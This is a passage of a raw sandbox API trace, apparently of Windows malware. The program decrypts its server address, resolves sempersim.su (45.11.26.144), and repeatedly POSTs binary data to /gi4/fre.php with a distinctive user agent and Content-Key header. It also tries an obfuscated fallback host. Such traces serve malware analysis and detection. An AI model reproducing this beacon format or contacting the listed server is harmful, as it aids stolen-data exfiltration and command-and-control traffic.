returned 0x76d00000 [0152.497] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0152.498] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0152.498] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0152.499] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0152.499] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0152.499] GetProcessHeap () returned 0x5b0000 [0152.499] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0152.499] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5c5d08*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0152.501] GetProcessHeap () returned 0x5b0000 [0152.501] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca990 [0152.501] socket (af=2, type=1, protocol=6) returned 0x298 [0152.501] connect (s=0x298, name=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0152.568] FreeAddrInfoW (pAddrInfo=0x5c5d08*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0152.568] GetProcessHeap () returned 0x5b0000 [0152.569] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c60f0 [0152.569] GetProcessHeap () returned 0x5b0000 [0152.569] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0152.569] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0152.570] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0152.570] GetProcessHeap () returned 0x5b0000 [0152.570] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6178 [0152.570] GetProcessHeap () returned 0x5b0000 [0152.571] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0152.571] GetProcessHeap () returned 0x5b0000 [0152.571] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d2f60 [0152.571] GetProcessHeap () returned 0x5b0000 [0152.571] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0152.572] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0152.572] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0152.573] GetProcessHeap () returned 0x5b0000 [0152.573] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5c6230 [0152.573] GetProcessHeap () returned 0x5b0000 [0152.573] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0152.573] send (s=0x298, buf=0x5c6230*, len=236, flags=0) returned 236 [0152.574] send (s=0x298, buf=0x5d1e18*, len=159, flags=0) returned 159 [0152.574] GetProcessHeap () returned 0x5b0000 [0152.574] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5cd170 [0152.574] recv (in: s=0x298, buf=0x5cd170, len=4048, flags=0 | out: buf=0x5cd170*) returned 237 [0154.552] GetProcessHeap () returned 0x5b0000 [0154.552] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6230 | out: hHeap=0x5b0000) returned 1 [0154.552] GetProcessHeap () returned 0x5b0000 [0154.552] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2f60 | out: hHeap=0x5b0000) returned 1 [0154.553] GetProcessHeap () returned 0x5b0000 [0154.553] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6178 | out: hHeap=0x5b0000) returned 1 [0154.553] GetProcessHeap () returned 0x5b0000 [0154.553] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c60f0 | out: hHeap=0x5b0000) returned 1 [0154.553] closesocket (s=0x298) returned 0 [0154.554] GetProcessHeap () returned 0x5b0000 [0154.554] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca990 | out: hHeap=0x5b0000) returned 1 [0154.554] GetProcessHeap () returned 0x5b0000 [0154.555] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d4e48 | out: hHeap=0x5b0000) returned 1 [0154.555] GetProcessHeap () returned 0x5b0000 [0154.555] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3668 | out: hHeap=0x5b0000) returned 1 [0154.555] GetProcessHeap () returned 0x5b0000 [0154.555] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0154.555] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5cd170, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x858) returned 0x298 [0154.558] Sleep (dwMilliseconds=0xea60) [0154.574] GetProcessHeap () returned 0x5b0000 [0154.574] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d31e8 [0154.575] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0154.575] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0154.582] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0154.583] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5ccad8) returned 1 [0154.767] GetProcessHeap () returned 0x5b0000 [0154.773] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8620 [0154.774] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0154.774] CryptImportKey (in: hProv=0x5ccad8, pbData=0x5c8620, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0154.778] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0154.779] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0154.779] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0154.780] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0154.780] GetProcessHeap () returned 0x5b0000 [0154.780] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8620 | out: hHeap=0x5b0000) returned 1 [0154.781] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0154.782] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d31e8, pdwDataLen=0xdfcfc | out: pbData=0x5d31e8, pdwDataLen=0xdfcfc) returned 1 [0154.782] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0154.783] CryptDestroyKey (hKey=0x5be288) returned 1 [0154.783] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0154.784] CryptReleaseContext (hProv=0x5ccad8, dwFlags=0x0) returned 1 [0154.784] GetProcessHeap () returned 0x5b0000 [0154.784] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d56e8 [0154.785] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0154.785] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0154.786] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0154.786] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0154.787] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0154.787] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0154.788] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0154.788] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0154.788] GetProcessHeap () returned 0x5b0000 [0154.789] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0154.789] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0154.789] GetProcessHeap () returned 0x5b0000 [0154.789] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0154.790] GetProcessHeap () returned 0x5b0000 [0154.790] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d56e8 | out: hHeap=0x5b0000) returned 1 [0154.790] GetProcessHeap () returned 0x5b0000 [0154.790] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d31e8 | out: hHeap=0x5b0000) returned 1 [0154.790] GetProcessHeap () returned 0x5b0000 [0154.790] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3668 [0154.792] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0154.793] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0154.797] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0154.798] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5ccad8) returned 1 [0154.804] GetProcessHeap () returned 0x5b0000 [0154.804] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0154.805] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0154.806] CryptImportKey (in: hProv=0x5ccad8, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0154.807] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0154.808] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0154.808] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0154.809] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0154.809] GetProcessHeap () returned 0x5b0000 [0154.809] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0154.810] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0154.810] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3668, pdwDataLen=0xdfcfc | out: pbData=0x5d3668, pdwDataLen=0xdfcfc) returned 1 [0154.811] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0154.811] CryptDestroyKey (hKey=0x5bde08) returned 1 [0154.812] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0154.812] CryptReleaseContext (hProv=0x5ccad8, dwFlags=0x0) returned 1 [0154.812] GetProcessHeap () returned 0x5b0000 [0154.812] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d63d8 [0154.813] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0154.813] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0154.814] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0154.814] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0154.815] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0154.815] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0154.815] GetProcessHeap () returned 0x5b0000 [0154.815] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0154.816] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5c5b50*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0154.879] GetProcessHeap () returned 0x5b0000 [0154.879] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca9f0 [0154.879] socket (af=2, type=1, protocol=6) returned 0x29c [0154.879] connect (s=0x29c, name=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0154.947] FreeAddrInfoW (pAddrInfo=0x5c5b50*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0154.947] GetProcessHeap () returned 0x5b0000 [0154.947] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c6200 [0154.947] GetProcessHeap () returned 0x5b0000 [0154.947] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0154.948] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0154.949] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0154.949] GetProcessHeap () returned 0x5b0000 [0154.949] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6288 [0154.949] GetProcessHeap () returned 0x5b0000 [0154.949] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0154.949] GetProcessHeap () returned 0x5b0000 [0154.949] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d2e40 [0154.949] GetProcessHeap () returned 0x5b0000 [0154.949] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0154.950] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0154.951] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0154.951] GetProcessHeap () returned 0x5b0000 [0154.951] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cd170 [0154.951] GetProcessHeap () returned 0x5b0000 [0154.951] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0154.951] send (s=0x29c, buf=0x5cd170*, len=236, flags=0) returned 236 [0154.952] send (s=0x29c, buf=0x5d1e18*, len=159, flags=0) returned 159 [0154.952] GetProcessHeap () returned 0x5b0000 [0154.952] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5cd268 [0154.952] recv (in: s=0x29c, buf=0x5cd268, len=4048, flags=0 | out: buf=0x5cd268*) returned 237 [0156.509] GetProcessHeap () returned 0x5b0000 [0156.509] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cd170 | out: hHeap=0x5b0000) returned 1 [0156.509] GetProcessHeap () returned 0x5b0000 [0156.510] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2e40 | out: hHeap=0x5b0000) returned 1 [0156.510] GetProcessHeap () returned 0x5b0000 [0156.510] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6288 | out: hHeap=0x5b0000) returned 1 [0156.510] GetProcessHeap () returned 0x5b0000 [0156.510] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0156.510] closesocket (s=0x29c) returned 0 [0156.511] GetProcessHeap () returned 0x5b0000 [0156.511] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca9f0 | out: hHeap=0x5b0000) returned 1 [0156.511] GetProcessHeap () returned 0x5b0000 [0156.511] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d63d8 | out: hHeap=0x5b0000) returned 1 [0156.511] GetProcessHeap () returned 0x5b0000 [0156.512] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3668 | out: hHeap=0x5b0000) returned 1 [0156.512] GetProcessHeap () returned 0x5b0000 [0156.512] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0156.513] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5cd268, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x630) returned 0x29c [0156.514] Sleep (dwMilliseconds=0xea60) [0156.530] GetProcessHeap () returned 0x5b0000 [0156.530] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3038 [0156.531] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0156.531] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0156.538] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0156.539] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5cc8) returned 1 [0156.547] GetProcessHeap () returned 0x5b0000 [0156.547] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8560 [0156.556] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0156.557] CryptImportKey (in: hProv=0x5c5cc8, pbData=0x5c8560, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0156.557] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0156.558] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0156.558] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0156.559] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0156.559] GetProcessHeap () returned 0x5b0000 [0156.559] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8560 | out: hHeap=0x5b0000) returned 1 [0156.560] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0156.560] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3038, pdwDataLen=0xdfcfc | out: pbData=0x5d3038, pdwDataLen=0xdfcfc) returned 1 [0156.561] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0156.561] CryptDestroyKey (hKey=0x5be048) returned 1 [0156.562] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0156.572] CryptReleaseContext (hProv=0x5c5cc8, dwFlags=0x0) returned 1 [0156.572] GetProcessHeap () returned 0x5b0000 [0156.572] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5910 [0156.573] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0156.573] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0156.574] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0156.574] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0156.575] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0156.575] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0156.576] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0156.576] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0156.576] GetProcessHeap () returned 0x5b0000 [0156.576] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb100 [0156.576] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0156.577] GetProcessHeap () returned 0x5b0000 [0156.577] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb100 | out: hHeap=0x5b0000) returned 1 [0156.643] GetProcessHeap () returned 0x5b0000 [0156.643] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5910 | out: hHeap=0x5b0000) returned 1 [0156.643] GetProcessHeap () returned 0x5b0000 [0156.643] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3038 | out: hHeap=0x5b0000) returned 1 [0156.643] GetProcessHeap () returned 0x5b0000 [0156.643] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d30c8 [0156.644] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0156.645] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0156.652] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0156.652] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5cc8) returned 1 [0156.757] GetProcessHeap () returned 0x5b0000 [0156.757] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8620 [0156.758] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0156.758] CryptImportKey (in: hProv=0x5c5cc8, pbData=0x5c8620, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0156.758] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0156.759] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0156.759] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0156.760] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0156.760] GetProcessHeap () returned 0x5b0000 [0156.760] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8620 | out: hHeap=0x5b0000) returned 1 [0156.761] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0156.761] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d30c8, pdwDataLen=0xdfcfc | out: pbData=0x5d30c8, pdwDataLen=0xdfcfc) returned 1 [0156.761] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0156.762] CryptDestroyKey (hKey=0x5bde08) returned 1 [0156.762] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0156.762] CryptReleaseContext (hProv=0x5c5cc8, dwFlags=0x0) returned 1 [0156.762] GetProcessHeap () returned 0x5b0000 [0156.762] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5298 [0156.763] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0156.763] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0156.764] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0156.764] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0156.767] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0156.767] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0156.767] GetProcessHeap () returned 0x5b0000 [0156.767] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0156.767] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cd628*(ai_flags=0, ai_family=2, 